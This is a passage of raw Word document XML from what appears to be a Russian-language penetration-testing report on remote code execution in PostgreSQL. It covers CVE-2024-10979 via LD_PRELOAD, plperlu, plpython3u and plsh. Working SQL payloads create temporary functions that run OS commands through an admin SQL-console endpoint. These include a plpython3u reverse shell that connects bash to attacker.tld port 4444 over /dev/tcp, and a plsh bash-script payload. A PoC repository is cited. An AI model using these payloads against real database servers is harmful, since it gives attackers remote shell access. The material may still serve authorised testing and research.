          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в env — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auditd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> фильтр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">execve</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auid postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + env containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD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Уязвимы все ветки PG до фикса 14.11.2024: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Ветка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 до</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16.5</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13.17</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12.21 (EOL ветка, последний фикс)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На версиях PG ≥ 17.1 / 16.5 / 15.9 / 14.14 / 13.17 / 12.21 атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">закрыта</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$ENV{...} = ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в trusted plperl даёт runtime-ошибку Safe.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PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — типичный spawning-вектор для активации LD_PRELOAD после установки в env. Хотя если есть COPY PROGRAM напрямую, CVE-2024-10979 редко даёт что-то сверху.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3.7.2a plperlu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — то же RCE, но при наличии superuser. CVE-2024-10979 — обходной путь без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3.6.4 `lo_export`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — канал доставки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до использования preload. Требует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 это reduces, но не исключает применимость.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — extension scripts: один из путей получить право установить plperl, если оно не установлено по умолчанию.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стакинг для протаскивания </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION ... ; SELECT fn()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через одну точку инъекции.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 (Хронология 2024)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст по фиксам 14.11.2024 (CVE-2024-10976, 10977, 10978, 10979).</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CVE-2024-10979 — https://www.postgresql.org/support/security/CVE-2024-10979/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PoC репозиторий: gh-ost00/CVE-2024-10979 — https://github.com/gh-ost00/CVE-2024-10979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RedRays: «Reproducing CVE-2024-10979 — step-by-step guide» — https://redrays.io/blog/reproducing-cve-2024-10979-a-step-by-step-guide/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«PL/Perl — Trusted and Untrusted» — https://www.postgresql.org/docs/current/plperl-trusted.html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NIST NVD: CVE-2024-10979 — https://nvd.nist.gov/vuln/detail/CVE-2024-10979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R7 (sources/research.md, строки 145–160)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7.3 plpython3u и plsh (untrusted Python и shell)</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(untrusted PL/Python 3) и </w:t>
      </w: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(PL/sh) — два других untrusted-расширения procedural languages для PostgreSQL, аналоги plperlu (3.7.2a) на других runtimes. Оба разрешают полный доступ к OS-API из тела функции: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 через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import os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subprocess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, открытые file/socket; </w:t>
      </w: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 само тело функции является bash-скриптом. CREATE FUNCTION в обоих требует superuser-привилегию, как и для plperlu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительные untrusted-языки, реже встречающиеся в production: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PL/R, untrusted, для статистических вычислений) и trusted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plv8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PL/JavaScript на V8, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">trusted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> по умолчанию — для большинства атак безопасен, но имеет периодические CVE через V8-engine). Эти два — одна строка в саммари, без отдельных карточек.</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app/api/admin/sql_console.py — тот же sink, что в 3.7.2a</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get_superuser_session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@router.post("/admin/sql/run")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def run_sql(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query: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Depends(get_superuser_session),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session.execute(text(query))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Прямой sink — SQL-console под superuser-сессией. Альтернативно — SQLi через стакинг (3.5) в любой endpoint, использующий superuser-роль.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — plpython3u</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pg_temp.x() RETURNS text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plpython3u AS $py$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  return subprocess.check_output(['id'], text=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$py$;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_temp.x();</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(то же самое):</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pg_temp.x() RETURNS text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plpython3u AS $py$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  return subprocess.check_output(['id'], text=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$py$;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_temp.x();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import subprocess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступен — sandbox отсутствует. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">check_output(['id'])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> выполняет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, возвращает stdout. Результат </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=999(postgres) ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> приходит в HTTP-ответ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse-shell вариант:</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pg_temp.rev() RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plpython3u AS $py$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  import os</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  os.system("bash -c 'bash -i &gt;&amp; /dev/tcp/attacker.tld/4444 0&gt;&amp;1'")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$py$;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_temp.rev();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">os.system()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> запускает shell, передаёт строку, форкает процесс. PostgreSQL-сессия повиснет до завершения shell-команды.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — plsh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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использует тело функции как bash-скрипт, передавая аргументы функции как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$2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ... Это самый прямой untrusted-язык: ничего парсить не надо, любая строка — это bash.</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pg_temp.s() RETURNS text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plsh AS $sh$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
